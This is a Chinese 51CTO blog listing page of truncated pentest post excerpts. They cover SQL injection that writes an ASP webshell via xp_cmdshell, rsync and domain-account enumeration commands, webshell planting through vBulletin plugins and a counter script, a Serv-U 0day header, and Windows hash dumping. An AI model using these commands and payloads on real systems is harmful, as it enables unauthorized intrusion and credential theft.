lovec的博客_sql,pentest paper,others_51CTO博客
51CTO首页
AI.x社区
博客
学堂
精品班
软考社区
免费课
企业培训
鸿蒙开发者社区
WOT技术大会
IT证书
公众号矩阵
移动端
短视频 免费课程 课程排行 直播课 软考学堂
全部课程 软考 华为认证 厂商认证 IT技术 PMP项目管理 免费题库
在线学习
文章 资源 问答 课堂 专栏 直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO软考
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
51CTO软考题库

我的友情链接

51CTO博客开发

原创 2017-11-22 23:07:29 267 阅读

sybase inject paper

14.3 Sybase内的MS SQL Server 注入技术 有大量的关于Microsoft SQL Server应用程序内SQL注入的文章被发表,这是因为Sybase 和MS SQL Server有共同的来源,值得快速研究一下这个著名的技术和其在Sybase内的工作方式。 14.3.1 注释 Sybase使用“--”和“/*”注释风

职场
sybase
休闲
转载 2012-01-06 12:08:34 1569 阅读 1评论

关于HTTP_X_FORWARDED_FOR

<?php function getClientIp() {     if (!empty($_SERVER["HTTP_CLIENT_IP"]))         $ip = $_SERVER["HTTP_CLIENT_IP"];  

职场
休闲
X_FORWARDED_FOR
原创 2012-01-05 12:17:27 5335 阅读

rsync用法总结

首先查看873端口是否开放。 然后使用 rsync xxx.xxx.xxx.xxx:: 查看是否可以看到目录。 看相应的下级目录(注意一定要在目录后面添加上/) rsync 210.51.X.X::htdocs_app/ rsync 210.51.X.X::auto/ rsync 210.51.X.X::edu/ 2.下载rsync服务器上的配置文件 rsync -avz

职场
休闲
rsy
转载 2012-01-05 10:20:29 574 阅读

dc相关命令

查询域管理员用户:net group "domain admins" /domainT00LS& W% c7 S. C6 M$ ^! E2 t 查询域用户:net user /domain 8 q5 l6 X% s0 q& ^) O* f 查询域名称:net view /domain Security$ m7 o1 r8 x* k! B"

职场
休闲
domain
转载 2011-12-15 13:07:05 493 阅读

sql inject1

1、   用^转义字符来写ASP(一句话木马)文件的方法: ?   http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runa

职场
server
数据库
休闲
转载 2011-12-15 11:12:33 512 阅读

vBulletin 4.X

Plugins & Products选项>>Add New Plugin(添加一个新插件) Hook Location 选择ajax_complete,Title处随便写了,Plugin PHP Code :写入一句话; 直接访问http://xxooxooo.com/ajax.php 一句话 另求PHP带端口扫描WEBSH

职场
休闲
better
转载 2011-12-14 17:10:16 1248 阅读

Serv-U FTP

I m better than TESO! CONFIDENTIAL SOURCE MATERIALS! [*]----------------------------------------------------[*] Serv-U FTP Server Jail Break 0day Discovered By Kingcope Year 2011 [*]------------

职场
休闲
better
转载 2011-12-13 21:23:16 668 阅读

阿江统计拿WebShell

阿江统计拿WebShell 第一: 前提知道数据库路经,并且改成asp或asa后缀!阿江计数程序,可以通过 http://网站/stat.asp?style=text&referer=代码内容&screenwidth=1024 直接提交,即可把代码内容直接插入到计数系统的数据库中,而此系统默认数据库为count#.asa,我们可以通过http://

asp
职场
WebShell
休闲
aj
转载 2011-02-16 11:28:09 663 阅读

记录一次搞站

原文已经发到了黑防10年,记录丢失了,本来是想发自己空间的 ,一直没发,现在重新搞一次,然后记录之,勿转,谢谢。 xx.xx.50.163 数据库 192.168.0.155 websa   搞定 TCP ports (6) 21,22,80,111,1521,8080 xx.xx.50.164 邮件1 TCP ports (6) 21,22,25,80

安全
数据库
休闲
搞站
原创 2011-02-16 10:06:43 422 阅读 1点赞 1评论

压力测试

wget ftp://ftp.joedog.org/pub/siege/siege-latest.tar.gz siege http://www.*.com -c200 -t5 siege -c 300 -r 2 http://www.*.cn/ProductReviewContext.aspx?id=314 -b wget http://blog.s135.com/soft/l

职场
休闲
压力测试
原创 2011-02-16 09:04:59 667 阅读

关于windows~hash的一点小经验

今天群里有人在那说wce抓不出来hash,我研究了下,windows2003默认wce抓出来是add,但是gsdump抓出来是正常的,可破的。然后改为发送lm与ntlm,重启服务器,然后再wce抓 就抓的出来 了  还有就是add开头的 ,是无法破的。   超过14位的windows密码,lm段为全0   windows策略限制,组策略改

职场
休闲
windows hash
原创 2011-01-06 16:04:46 763 阅读 1点赞

gcc编译出错

在Linux 环境下gcc编译exp的时候,,经常遇到如下警告信息   只需要在源代码中添加两个头文件: #include <stdio.h> #include <stdlib.h> #include<string.h>    绝对没问题~

职场
编译
gcc
休闲
原创 2010-07-21 00:14:56 481 阅读

na pass~

前几天把na 过了,好久以前都说去考,一直觉得太贵了。没去考。结果上个星期5还是去了。学了不考也不行。找工作,人家都还认这个,没害处。考了,结果就过了。

职场
生活
休闲
na
原创 2009-04-15 21:24:03 499 阅读 2评论

网工pass了~

呵呵,第2次考了。上次就是太大意了。以为一定过了,都没检查,粗心大意,做得来的题都挂了,下午结果差了2分。这回总算无惊无险,还是一贯的风格,上午提前1个小时交卷,下午提前1个半小时交卷,和上次比,唯一不同的是这次检查了一遍,就过了~让我多等了一年(上半年,地震没考的成)~CAO!

职场
网络工程师
休闲
原创 2009-02-28 11:56:05 475 阅读 2评论

Copyright © 2005-2025 51CTO.COM 版权所有 京ICP证060544号

关于我们
官方博客 全部文章 热门标签 班级博客
了解我们 网站地图 意见反馈
友情链接
鸿蒙开发者社区 51CTO学堂
51CTO 软考资讯